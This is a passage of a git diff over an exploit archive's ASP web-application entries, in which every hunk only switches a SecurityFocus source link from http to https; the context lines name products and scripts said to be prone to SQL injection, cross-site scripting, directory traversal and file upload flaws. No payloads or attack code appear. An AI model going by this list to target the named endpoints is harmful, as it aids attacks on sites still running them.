@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25586.txt b/exploits/asp/webapps/25586.txt index a11f030b2..b26cfa926 100644 --- a/exploits/asp/webapps/25586.txt +++ b/exploits/asp/webapps/25586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25587.txt b/exploits/asp/webapps/25587.txt index 7cd7a00e4..a99c4febc 100644 --- a/exploits/asp/webapps/25587.txt +++ b/exploits/asp/webapps/25587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25588.txt b/exploits/asp/webapps/25588.txt index da54ba159..d1993126b 100644 --- a/exploits/asp/webapps/25588.txt +++ b/exploits/asp/webapps/25588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25589.txt b/exploits/asp/webapps/25589.txt index 15dfba4b7..f26d1c2ef 100644 
--- a/exploits/asp/webapps/25589.txt +++ b/exploits/asp/webapps/25589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13466/info +source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25595.txt b/exploits/asp/webapps/25595.txt index 7371d73bc..d299244e5 100644 --- a/exploits/asp/webapps/25595.txt +++ b/exploits/asp/webapps/25595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13485/info +source: https://www.securityfocus.com/bid/13485/info ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25596.txt b/exploits/asp/webapps/25596.txt index 7ac512b2a..5db48f768 100644 --- a/exploits/asp/webapps/25596.txt +++ b/exploits/asp/webapps/25596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13487/info +source: https://www.securityfocus.com/bid/13487/info ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25651.txt b/exploits/asp/webapps/25651.txt index 7cb0f2c44..cd79a9da0 100644 --- a/exploits/asp/webapps/25651.txt +++ b/exploits/asp/webapps/25651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13601/info +source: https://www.securityfocus.com/bid/13601/info MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks. 
diff --git a/exploits/asp/webapps/25661.txt b/exploits/asp/webapps/25661.txt index e5ccc3e53..919fea716 100644 --- a/exploits/asp/webapps/25661.txt +++ b/exploits/asp/webapps/25661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13630/info +source: https://www.securityfocus.com/bid/13630/info Keyvan1 ImageGallery is prone to an access validation vulnerability that could allow the underlying database to be downloaded. diff --git a/exploits/asp/webapps/25667.txt b/exploits/asp/webapps/25667.txt index 2c8b9640b..3782dce32 100644 --- a/exploits/asp/webapps/25667.txt +++ b/exploits/asp/webapps/25667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13639/info +source: https://www.securityfocus.com/bid/13639/info MetaCart e-Shop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25700.txt b/exploits/asp/webapps/25700.txt index 602c379cb..ced8c435f 100644 --- a/exploits/asp/webapps/25700.txt +++ b/exploits/asp/webapps/25700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13733/info +source: https://www.securityfocus.com/bid/13733/info Spread The Word is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25701.txt b/exploits/asp/webapps/25701.txt index e3df5e09c..551d6efb1 100644 --- a/exploits/asp/webapps/25701.txt +++ b/exploits/asp/webapps/25701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13737/info +source: https://www.securityfocus.com/bid/13737/info Spread The Word is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25705.txt b/exploits/asp/webapps/25705.txt index 05cb6d483..467251f91 100644 
--- a/exploits/asp/webapps/25705.txt +++ b/exploits/asp/webapps/25705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13761/info +source: https://www.securityfocus.com/bid/13761/info FunkyASP AD Systems is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25751.txt b/exploits/asp/webapps/25751.txt index ea604587c..88e8d37b0 100644 --- a/exploits/asp/webapps/25751.txt +++ b/exploits/asp/webapps/25751.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13804/info +source: https://www.securityfocus.com/bid/13804/info os4e is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25753.txt b/exploits/asp/webapps/25753.txt index abcd2c41b..ab29cc7b8 100644 --- a/exploits/asp/webapps/25753.txt +++ b/exploits/asp/webapps/25753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13806/info +source: https://www.securityfocus.com/bid/13806/info Hosting Controller is reported prone to multiple vulnerabilities. These issues can allow an attacker gain unauthorized access to data and carry out SQL injection attacks. diff --git a/exploits/asp/webapps/25754.txt b/exploits/asp/webapps/25754.txt index a633102bf..9bd4a3dee 100644 --- a/exploits/asp/webapps/25754.txt +++ b/exploits/asp/webapps/25754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13806/info +source: https://www.securityfocus.com/bid/13806/info Hosting Controller is reported prone to multiple vulnerabilities. These issues can allow an attacker gain unauthorized access to data and carry out SQL injection attacks. diff --git a/exploits/asp/webapps/25758.txt b/exploits/asp/webapps/25758.txt index 4c9fc76c1..10bc10482 100644 --- a/exploits/asp/webapps/25758.txt +++ b/exploits/asp/webapps/25758.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13816/info +source: https://www.securityfocus.com/bid/13816/info Hosting Controller is prone to an unauthorized access vulnerability. diff --git a/exploits/asp/webapps/25780.txt b/exploits/asp/webapps/25780.txt index cb409c0ac..2d85bd7cb 100644 --- a/exploits/asp/webapps/25780.txt +++ b/exploits/asp/webapps/25780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13833/info +source: https://www.securityfocus.com/bid/13833/info JiRo's Upload System is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25781.txt b/exploits/asp/webapps/25781.txt index 415d6ce14..75e3667b2 100644 --- a/exploits/asp/webapps/25781.txt +++ b/exploits/asp/webapps/25781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13834/info +source: https://www.securityfocus.com/bid/13834/info NEXTWEB (i)Site is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/25783.txt b/exploits/asp/webapps/25783.txt index 32911d3cb..e5094b3ab 100644 --- a/exploits/asp/webapps/25783.txt +++ b/exploits/asp/webapps/25783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13836/info +source: https://www.securityfocus.com/bid/13836/info livingmailing is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25785.txt b/exploits/asp/webapps/25785.txt index 48090ff9b..af429c663 100644 --- a/exploits/asp/webapps/25785.txt +++ b/exploits/asp/webapps/25785.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13841/info +source: https://www.securityfocus.com/bid/13841/info Liberum Help Desk is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25790.txt b/exploits/asp/webapps/25790.txt index 60af32437..a680ccd32 100644 --- a/exploits/asp/webapps/25790.txt +++ b/exploits/asp/webapps/25790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13859/info +source: https://www.securityfocus.com/bid/13859/info WWWeb Concepts Events System is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25795.txt b/exploits/asp/webapps/25795.txt index 001ad21ba..1433f40b0 100644 --- a/exploits/asp/webapps/25795.txt +++ b/exploits/asp/webapps/25795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25796.txt b/exploits/asp/webapps/25796.txt index 8cf4a4188..650af91b6 100644 --- a/exploits/asp/webapps/25796.txt +++ b/exploits/asp/webapps/25796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25797.txt b/exploits/asp/webapps/25797.txt index 5b122adc0..3aeb7550a 100644 --- a/exploits/asp/webapps/25797.txt 
+++ b/exploits/asp/webapps/25797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25798.txt b/exploits/asp/webapps/25798.txt index 8544a3463..fac979ae6 100644 --- a/exploits/asp/webapps/25798.txt +++ b/exploits/asp/webapps/25798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13881/info +source: https://www.securityfocus.com/bid/13881/info ProductCart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25804.txt b/exploits/asp/webapps/25804.txt index 2d36cef70..0f006ce5d 100644 --- a/exploits/asp/webapps/25804.txt +++ b/exploits/asp/webapps/25804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13898/info +source: https://www.securityfocus.com/bid/13898/info Loki Download Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'default.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25805.txt b/exploits/asp/webapps/25805.txt index 2c2320513..d47a45909 100644 --- a/exploits/asp/webapps/25805.txt +++ b/exploits/asp/webapps/25805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13900/info +source: https://www.securityfocus.com/bid/13900/info Loki Download Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'catinfo.asp' script before using it in an SQL query. 
diff --git a/exploits/asp/webapps/25839.txt b/exploits/asp/webapps/25839.txt index 68c98ab3c..166d045b3 100644 --- a/exploits/asp/webapps/25839.txt +++ b/exploits/asp/webapps/25839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13976/info +source: https://www.securityfocus.com/bid/13976/info Cool Cafe Chat is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25843.txt b/exploits/asp/webapps/25843.txt index 6bf76a8fc..8e29d138c 100644 --- a/exploits/asp/webapps/25843.txt +++ b/exploits/asp/webapps/25843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13991/info +source: https://www.securityfocus.com/bid/13991/info Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25844.txt b/exploits/asp/webapps/25844.txt index 9125a1879..78eeee7e0 100644 --- a/exploits/asp/webapps/25844.txt +++ b/exploits/asp/webapps/25844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13991/info +source: https://www.securityfocus.com/bid/13991/info Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25845.txt b/exploits/asp/webapps/25845.txt index 88682930d..9dc62c2aa 100644 --- a/exploits/asp/webapps/25845.txt +++ b/exploits/asp/webapps/25845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13994/info +source: https://www.securityfocus.com/bid/13994/info Ublog Reload is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/asp/webapps/25847.txt b/exploits/asp/webapps/25847.txt index 3f0cf3908..d5d09c666 100644 --- a/exploits/asp/webapps/25847.txt +++ b/exploits/asp/webapps/25847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13998/info +source: https://www.securityfocus.com/bid/13998/info StoreFront Shopping Cart is affected by an SQL injection vulnerability. The vulnerability affects the 'login.asp' script. diff --git a/exploits/asp/webapps/25853.txt b/exploits/asp/webapps/25853.txt index 5e9c52d28..3851792fd 100644 --- a/exploits/asp/webapps/25853.txt +++ b/exploits/asp/webapps/25853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14000/info +source: https://www.securityfocus.com/bid/14000/info i-Gallery is prone to a directory traversal vulnerability. diff --git a/exploits/asp/webapps/25855.txt b/exploits/asp/webapps/25855.txt index be11afa1b..d442898e1 100644 --- a/exploits/asp/webapps/25855.txt +++ b/exploits/asp/webapps/25855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14002/info +source: https://www.securityfocus.com/bid/14002/info i-Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'folder' parameter of 'folderview.asp'. diff --git a/exploits/asp/webapps/25858.txt b/exploits/asp/webapps/25858.txt index 94211da7b..9f5efd37c 100644 --- a/exploits/asp/webapps/25858.txt +++ b/exploits/asp/webapps/25858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14029/info +source: https://www.securityfocus.com/bid/14029/info DUportal Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25863.txt b/exploits/asp/webapps/25863.txt index f919bfafe..867562794 100644 --- a/exploits/asp/webapps/25863.txt +++ b/exploits/asp/webapps/25863.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25864.txt b/exploits/asp/webapps/25864.txt index 963b9c422..808bf2fde 100644 --- a/exploits/asp/webapps/25864.txt +++ b/exploits/asp/webapps/25864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25865.txt b/exploits/asp/webapps/25865.txt index 08182955d..c8ce31530 100644 --- a/exploits/asp/webapps/25865.txt +++ b/exploits/asp/webapps/25865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14033/info +source: https://www.securityfocus.com/bid/14033/info DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25866.txt b/exploits/asp/webapps/25866.txt index 36f1ff3e4..8a8b007fe 100644 --- a/exploits/asp/webapps/25866.txt +++ b/exploits/asp/webapps/25866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14034/info +source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25867.txt b/exploits/asp/webapps/25867.txt index d64227e37..8b46f31dd 100644 --- a/exploits/asp/webapps/25867.txt +++ b/exploits/asp/webapps/25867.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14034/info +source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25868.txt b/exploits/asp/webapps/25868.txt index fe684a432..c1faa5a54 100644 --- a/exploits/asp/webapps/25868.txt +++ b/exploits/asp/webapps/25868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25869.txt b/exploits/asp/webapps/25869.txt index 3099f7533..7adb26860 100644 --- a/exploits/asp/webapps/25869.txt +++ b/exploits/asp/webapps/25869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25870.txt b/exploits/asp/webapps/25870.txt index 071a2b653..93a027d60 100644 --- a/exploits/asp/webapps/25870.txt +++ b/exploits/asp/webapps/25870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25871.txt b/exploits/asp/webapps/25871.txt index 98e25b467..aa7b5914a 100644 --- a/exploits/asp/webapps/25871.txt +++ b/exploits/asp/webapps/25871.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14035/info +source: https://www.securityfocus.com/bid/14035/info DUforum is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25872.txt b/exploits/asp/webapps/25872.txt index 7ea550d1e..a919af6bd 100644 --- a/exploits/asp/webapps/25872.txt +++ b/exploits/asp/webapps/25872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14036/info +source: https://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25873.txt b/exploits/asp/webapps/25873.txt index 571004560..b8f958819 100644 --- a/exploits/asp/webapps/25873.txt +++ b/exploits/asp/webapps/25873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14036/info +source: https://www.securityfocus.com/bid/14036/info DUclassmate is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25874.txt b/exploits/asp/webapps/25874.txt index 72c005baa..9053e53e7 100644 --- a/exploits/asp/webapps/25874.txt +++ b/exploits/asp/webapps/25874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14039/info +source: https://www.securityfocus.com/bid/14039/info WhatsUp Professional is prone to an SQL injection vulnerability affecting its Web-based front end. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query. diff --git a/exploits/asp/webapps/25905.txt b/exploits/asp/webapps/25905.txt index c2fcbc438..1f1dd8d93 100644 --- a/exploits/asp/webapps/25905.txt +++ b/exploits/asp/webapps/25905.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14062/info +source: https://www.securityfocus.com/bid/14062/info ASPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25906.txt b/exploits/asp/webapps/25906.txt index 6a9475c2e..cfbfc51a4 100644 --- a/exploits/asp/webapps/25906.txt +++ b/exploits/asp/webapps/25906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14062/info +source: https://www.securityfocus.com/bid/14062/info ASPNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25907.txt b/exploits/asp/webapps/25907.txt index bc749c2c9..59132a0bc 100644 --- a/exploits/asp/webapps/25907.txt +++ b/exploits/asp/webapps/25907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14063/info +source: https://www.securityfocus.com/bid/14063/info ASPNuke is prone to an HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25908.txt b/exploits/asp/webapps/25908.txt index 5df628404..2d73c9cd2 100644 --- a/exploits/asp/webapps/25908.txt +++ b/exploits/asp/webapps/25908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14070/info +source: https://www.securityfocus.com/bid/14070/info ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability. diff --git a/exploits/asp/webapps/25910.txt b/exploits/asp/webapps/25910.txt index f072760ae..1d18e42dd 100644 --- a/exploits/asp/webapps/25910.txt +++ b/exploits/asp/webapps/25910.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14078/info +source: https://www.securityfocus.com/bid/14078/info Community Server Forums is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25913.txt b/exploits/asp/webapps/25913.txt index 58b11c2d4..642f1abb5 100644 --- a/exploits/asp/webapps/25913.txt +++ b/exploits/asp/webapps/25913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14080/info +source: https://www.securityfocus.com/bid/14080/info Hosting Controller is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'error.asp' script. diff --git a/exploits/asp/webapps/25914.txt b/exploits/asp/webapps/25914.txt index b20287dec..eab9a7c41 100644 --- a/exploits/asp/webapps/25914.txt +++ b/exploits/asp/webapps/25914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14083/info +source: https://www.securityfocus.com/bid/14083/info Dynamic Biz Website Builder (QuickWeb) is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/25922.txt b/exploits/asp/webapps/25922.txt index b137079f1..9612aa295 100644 --- a/exploits/asp/webapps/25922.txt +++ b/exploits/asp/webapps/25922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14101/info +source: https://www.securityfocus.com/bid/14101/info CyberStrong eShop is prone to an SQL-injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. The attacker may accomplish this by passing malicious SQL syntax to the vulnerable '20review.asp' script. diff --git a/exploits/asp/webapps/25923.txt b/exploits/asp/webapps/25923.txt index 3ff84f6c9..c68a0efef 100644 --- a/exploits/asp/webapps/25923.txt +++ b/exploits/asp/webapps/25923.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14103/info +source: https://www.securityfocus.com/bid/14103/info CyberStrong eShop is prone to an SQL injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. The attacker may accomplish this by passing malicious SQL syntax to the vulnerable '10expand.asp' script. diff --git a/exploits/asp/webapps/25924.txt b/exploits/asp/webapps/25924.txt index d4d6f9d84..31ce4ff03 100644 --- a/exploits/asp/webapps/25924.txt +++ b/exploits/asp/webapps/25924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14111/info +source: https://www.securityfocus.com/bid/14111/info FSboard is prone to a directory traversal vulnerability. diff --git a/exploits/asp/webapps/25925.txt b/exploits/asp/webapps/25925.txt index 5528d9c96..11287e763 100644 --- a/exploits/asp/webapps/25925.txt +++ b/exploits/asp/webapps/25925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14112/info +source: https://www.securityfocus.com/bid/14112/info CyberStrong eShop is prone to an SQL injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. The attacker may accomplish this by passing malicious SQL syntax to the vulnerable '10browse.asp' script. diff --git a/exploits/asp/webapps/25953.txt b/exploits/asp/webapps/25953.txt index b4bf9ed1c..1352e43c2 100644 --- a/exploits/asp/webapps/25953.txt +++ b/exploits/asp/webapps/25953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14183/info +source: https://www.securityfocus.com/bid/14183/info Comersus Cart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25956.txt b/exploits/asp/webapps/25956.txt index cbeae18e1..8519202ef 100644 --- a/exploits/asp/webapps/25956.txt 
+++ b/exploits/asp/webapps/25956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14191/info +source: https://www.securityfocus.com/bid/14191/info Comersus Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25963.txt b/exploits/asp/webapps/25963.txt index 1997dabca..adad2d1f6 100644 --- a/exploits/asp/webapps/25963.txt +++ b/exploits/asp/webapps/25963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14220/info +source: https://www.securityfocus.com/bid/14220/info Dragonfly Commerce is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/25965.txt b/exploits/asp/webapps/25965.txt index 42f790c3e..74afcbd00 100644 --- a/exploits/asp/webapps/25965.txt +++ b/exploits/asp/webapps/25965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14223/info +source: https://www.securityfocus.com/bid/14223/info Dvbbs is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25981.txt b/exploits/asp/webapps/25981.txt index 97eb31ffd..fb873ee5f 100644 --- a/exploits/asp/webapps/25981.txt +++ b/exploits/asp/webapps/25981.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14258/info +source: https://www.securityfocus.com/bid/14258/info Hosting Controller is prone to an SQL injection vulnerability. diff --git a/exploits/asp/webapps/26033.txt b/exploits/asp/webapps/26033.txt index bf5dd1bac..6f1732ae3 100644 --- a/exploits/asp/webapps/26033.txt +++ b/exploits/asp/webapps/26033.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14386/info +source: https://www.securityfocus.com/bid/14386/info CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26069.txt b/exploits/asp/webapps/26069.txt index a34c8a805..3771f8b18 100644 --- a/exploits/asp/webapps/26069.txt +++ b/exploits/asp/webapps/26069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14468/info +source: https://www.securityfocus.com/bid/14468/info Naxtor E-directory is prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/26070.txt b/exploits/asp/webapps/26070.txt index 8de0fb882..85fab0b4c 100644 --- a/exploits/asp/webapps/26070.txt +++ b/exploits/asp/webapps/26070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14469/info +source: https://www.securityfocus.com/bid/14469/info Naxtor E-directory is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/26107.txt b/exploits/asp/webapps/26107.txt index 4d41dff3f..65c8b2558 100644 --- a/exploits/asp/webapps/26107.txt +++ b/exploits/asp/webapps/26107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14498/info +source: https://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/26108.txt b/exploits/asp/webapps/26108.txt index d5ea76e3a..85576d3ab 100644 --- a/exploits/asp/webapps/26108.txt +++ b/exploits/asp/webapps/26108.txt 
